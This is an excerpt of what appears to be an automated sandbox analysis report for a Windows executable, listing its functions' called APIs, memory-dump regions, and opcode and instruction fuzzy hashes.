                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                • String ID:
                                                                                • API String ID: 4119318379-0
                                                                                • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                • Instruction ID: f84913a357688a68e2c9d0d1995984ab345946b6a9cf62c872855684edccc12b
                                                                                • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                • Instruction Fuzzy Hash: DB41C339B1478286F7108F61E818BAA2360FB89F9CF480139DD1A67B9ACF3DDC458744
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 39ec4a74e49df8f56e32db411fcadac0f579ee807ced4d6d4e98762d9bdd5929
                                                                                • Instruction ID: 257ca17fec3e84e742434bf00ede5fdf3ebed8230426c0d2881613d67e690119
                                                                                • Opcode Fuzzy Hash: 39ec4a74e49df8f56e32db411fcadac0f579ee807ced4d6d4e98762d9bdd5929
                                                                                • Instruction Fuzzy Hash: C812B36AF08B8184EB10CB65D8492BD6361EB45B9CF440235DA5CA7ADBDF3CD989C340

                                                                                Control-flow Graph (graph data omitted; first block 7ff6559324c0, API calls: CreateFileW, GetLastError, SetFileTime)
                                                                                Similarity
                                                                                • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3536497005-0
                                                                                • Opcode ID: 3a28dd0dcfd7b89b689d9fe25ecc7464786bdc3a32dccfb94d5fbab1a7314792
                                                                                • Instruction ID: ac0281bbecca6cd03563e1d27caebfeba21feeb66a1736a925a8d77c6f5fa6d4
                                                                                • Opcode Fuzzy Hash: 3a28dd0dcfd7b89b689d9fe25ecc7464786bdc3a32dccfb94d5fbab1a7314792
                                                                                • Instruction Fuzzy Hash: 63611A6AA1878185EB208B69E40836EA7B1FB84BACF140335CF6D53AD5CF3DD858C740

                                                                                Similarity
                                                                                • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                • String ID: ]
                                                                                • API String ID: 2347093688-3352871620
                                                                                • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                • Instruction ID: e5e656c6ddb9065eb70b0d4c22f99c026ed1285c07e58ca7a7066fc534cc252b
                                                                                • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                • Instruction Fuzzy Hash: D2115429B0D6C282EE649B21965C2795392BF89FC9F0C0434D9AD97B9BDF2DEC048601

                                                                                Similarity
                                                                                • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                • String ID:
                                                                                • API String ID: 3621893840-0
                                                                                • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                • Instruction ID: 7efe8acff4a1233c34a2d5fe587a70727923a58063bdfd23e7046c5f3a8a8ea1
                                                                                • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                • Instruction Fuzzy Hash: 2DF06229F3858782F7108720E4ACB762251FFE4F09F885030E54ED5996DF2CE949C700

                                                                                Similarity
                                                                                • API ID: Message$DialogDispatchPeekTranslate
                                                                                • String ID:
                                                                                • API String ID: 1266772231-0
                                                                                • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                • Instruction ID: c08453c097b06bb08207ed9dc1793f72972742a35b367fc6cff71e6773c44190
                                                                                • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                • Instruction Fuzzy Hash: FDF0EC29B3858282FB509B20E9A9A362361BFD0F09F885435E55E96855DF2CE908CB01

                                                                                Similarity
                                                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                • String ID: EDIT
                                                                                • API String ID: 4243998846-3080729518
                                                                                • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                • Instruction ID: 0fe9bf8899dd0480aaa2056ffa1ad84b0dd5be788b51534c3f98a7dea920b08d
                                                                                • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                • Instruction Fuzzy Hash: 11013B65B147C3C1FA309751E8287B56350BF99F48F4C1035C95D9A656DF2CED498740

                                                                                Control-flow Graph (graph data omitted; first block 7ff655932ce0, API calls: GetStdHandle, WriteFile)
                                                                                Similarity
                                                                                • API ID: FileWrite$Handle
                                                                                • String ID:
                                                                                • API String ID: 4209713984-0
                                                                                • Opcode ID: 36bd0183a846d9ba9312903715bf2ef21d1db3e0abb52a3d50b28083c89a0b57
                                                                                • Instruction ID: ca28d5a30d76aa40f9223a9fe8c98ffa380f9448ef860dcfb0aaf9e99ad166d6
                                                                                • Opcode Fuzzy Hash: 36bd0183a846d9ba9312903715bf2ef21d1db3e0abb52a3d50b28083c89a0b57
                                                                                • Instruction Fuzzy Hash: B051086AA196C282EE10CB65D44877A6350FF44F98F580131EA1E96A92DF3CEC89C340
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                                • String ID:
                                                                                • API String ID: 3750147219-0
                                                                                • Opcode ID: deaa3fd9212449262d54ddd00df38e066acfc98fdf544c89e7b1965c67d44595
                                                                                • Instruction ID: b362aab1fd884c46035e7c05d895cb45f22ff6fb745eb83cfc0ae586962f7035
                                                                                • Opcode Fuzzy Hash: deaa3fd9212449262d54ddd00df38e066acfc98fdf544c89e7b1965c67d44595
                                                                                • Instruction Fuzzy Hash: 1651A06AF1469284FF009BA5D8493AD2362BF45F99F480635DA2CA6BD7DF6CE851C300
                                                                                Similarity
                                                                                • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2359106489-0
                                                                                • Opcode ID: 698fab9aec9050558ccefc1a665aee4a6282d07cda4dc8d84b776e202d03389b
                                                                                • Instruction ID: 680db2c49c833551cc8403a5cddc86ceb25b77b9ec716ddd6d2bb875b72936e2
                                                                                • Opcode Fuzzy Hash: 698fab9aec9050558ccefc1a665aee4a6282d07cda4dc8d84b776e202d03389b
                                                                                • Instruction Fuzzy Hash: DD31C76AA5C6C281EA209B29944D1796391FF84F98F5D0231EE9ED2796DF3CDC45C200
                                                                                Similarity
                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 1452418845-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                • String ID:
                                                                                • API String ID: 2244327787-0
                                                                                APIs
                                                                                  • Part of subcall function 00007FF65593ECD8: ResetEvent.KERNEL32 ref: 00007FF65593ECF1
                                                                                  • Part of subcall function 00007FF65593ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF65593ED07
                                                                                • ReleaseSemaphore.KERNEL32 ref: 00007FF65593E974
                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00007FF65593E993
                                                                                • DeleteCriticalSection.KERNEL32 ref: 00007FF65593E9AA
                                                                                • CloseHandle.KERNEL32 ref: 00007FF65593E9B7
                                                                                  • Part of subcall function 00007FF65593EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF65593E95F,?,?,?,00007FF65593463A,?,?,?), ref: 00007FF65593EA63
                                                                                  • Part of subcall function 00007FF65593EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF65593E95F,?,?,?,00007FF65593463A,?,?,?), ref: 00007FF65593EA6E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                                • String ID:
                                                                                • API String ID: 2143293610-0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Thread$CreatePriority
                                                                                • String ID: CreateThread failed
                                                                                • API String ID: 2610526550-3849766595
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: DirectoryInitializeMallocSystem
                                                                                • String ID: riched20.dll
                                                                                • API String ID: 174490985-3360196438
                                                                                APIs
                                                                                  • Part of subcall function 00007FF65594853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF65594856C
                                                                                  • Part of subcall function 00007FF65593AAE0: LoadStringW.USER32 ref: 00007FF65593AB67
                                                                                  • Part of subcall function 00007FF65593AAE0: LoadStringW.USER32 ref: 00007FF65593AB80
                                                                                  • Part of subcall function 00007FF655921FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF655921FFB
                                                                                  • Part of subcall function 00007FF65592129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF655921396
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6559501BB
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6559501C1
                                                                                • SendDlgItemMessageW.USER32 ref: 00007FF6559501F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                • String ID:
                                                                                • API String ID: 3106221260-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                                                                • String ID:
                                                                                • API String ID: 2032784890-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2371198981-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2272807158-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2176759853-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: std::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 1875163511-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1203560049-0
                                                                                • Opcode ID: f54af9b99a092d8e3351366c83bb5c41e52826feeb3933286249cd948367a950
                                                                                • Instruction ID: 23f20b842b88814b96a473fb5c9f27b6695901a63c2f974abda9a302f51c4196
                                                                                • Opcode Fuzzy Hash: f54af9b99a092d8e3351366c83bb5c41e52826feeb3933286249cd948367a950
                                                                                • Instruction Fuzzy Hash: 2821FB26A187C181EE208F29E44D2A963A1FF84F98F184230EA9D92696DF3CD944C640
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3118131910-0
                                                                                • Opcode ID: 932ad18ef346e480087a3096a192501f062bfc4628e0a3d12bdedb18b4200694
                                                                                • Instruction ID: aae16c0075eef580b6cb0f8bf8c850bbcc55f7fb9e5568720541e05830f66fb0
                                                                                • Opcode Fuzzy Hash: 932ad18ef346e480087a3096a192501f062bfc4628e0a3d12bdedb18b4200694
                                                                                • Instruction Fuzzy Hash: 5921C836A187C181EE108B29F44826E63A0FF85FDCF541230EA9E96A9ADF3CD940C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1203560049-0
                                                                                • Opcode ID: 85da30fe1743cc553a0db4a1375168b1f74b8b313009b96f55f923233ac5e066
                                                                                • Instruction ID: d0191de39463d9e3fd1a19a1aabd00f8602f00f7946d238e690ab54eefb2939b
                                                                                • Opcode Fuzzy Hash: 85da30fe1743cc553a0db4a1375168b1f74b8b313009b96f55f923233ac5e066
                                                                                • Instruction Fuzzy Hash: 42217476A187C181EA108B2DE44816963A1FFC9FA8F584231EA9D93BD6DF3CD944C640
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                • Instruction ID: 14bfdc50b2efbdddb01b5dc6003af4543bee963c9d1db9cadb46fe5e23753ea7
                                                                                • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                • Instruction Fuzzy Hash: D0E0122CA0478546EA546B2158693B913926F55F4AF184438DC0E92397CF3DAC1D4640
                                                                                APIs
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65592F895
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65592F89B
                                                                                  • Part of subcall function 00007FF655933EC8: FindClose.KERNELBASE(?,?,00000000,00007FF655940811), ref: 00007FF655933EFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                • String ID:
                                                                                • API String ID: 3587649625-0
                                                                                • Opcode ID: 8b88dc6aee5f75cd0ed49939a50d5e880870ec1b9edbe9d6c08afce2113f0c83
                                                                                • Instruction ID: 0b21a0f7d9b05405bc518c5a4b5865c3c4f8c4b4140f1f7ab1a6e9a166d028ff
                                                                                • Opcode Fuzzy Hash: 8b88dc6aee5f75cd0ed49939a50d5e880870ec1b9edbe9d6c08afce2113f0c83
                                                                                • Instruction Fuzzy Hash: EF91C337A18BC180EB10DB64D8491AD6361FB84B9CF884135EA5D67AEADF7CD985C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 1f58a31ba4ee0f4005a0c8d6f791800edb2061577446e7c94789ea881e83c99d
                                                                                • Instruction ID: fd052b9bdc91effc6f9bd2e62458895e4b7b6144a67fd375f40be006b6347df4
                                                                                • Opcode Fuzzy Hash: 1f58a31ba4ee0f4005a0c8d6f791800edb2061577446e7c94789ea881e83c99d
                                                                                • Instruction Fuzzy Hash: 6D41A26AF1869185FB00DBB1D8492AD2361AF45FDCF585235DE1DB7A9BDF3CD8828200
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF65593274D), ref: 00007FF6559328A9
                                                                                • GetLastError.KERNEL32(?,00007FF65593274D), ref: 00007FF6559328B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                • Instruction ID: a19ff644435ef3af37d8652698285d264f78fa1911497c1787d749ea32fc70fe
                                                                                • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                • Instruction Fuzzy Hash: 5131A73AB196D2C2EE604B6AD9486B5A390AF04FDCF1D4131DE5DA7792DF3CEC418640
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1746051919-0
                                                                                • Opcode ID: 3846a219fa003ef6eba4311ff2349970a98922bd5935619b32e66c41ec2b6e9c
                                                                                • Instruction ID: d29fb0e88add09353f007cd2b356515714287ffa6a3c8613c896b1e050d69664
                                                                                • Opcode Fuzzy Hash: 3846a219fa003ef6eba4311ff2349970a98922bd5935619b32e66c41ec2b6e9c
                                                                                • Instruction Fuzzy Hash: FD31E326A1878181EA108B55E84836EB360EF84F98F484231EB9C57B96DF3CE9508700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: File$BuffersFlushTime
                                                                                • String ID:
                                                                                • API String ID: 1392018926-0
                                                                                • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                • Instruction ID: 13ed64eda53092b5914524ede836272511c33122dea1e549199798d0a2123ac1
                                                                                • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                • Instruction Fuzzy Hash: 3821B526E0D7C2D1EE618F91E4087B697A4AF02F9CF1A4031DE4C56296EF3CDC46C200
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString
                                                                                • String ID:
                                                                                • API String ID: 2948472770-0
                                                                                • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
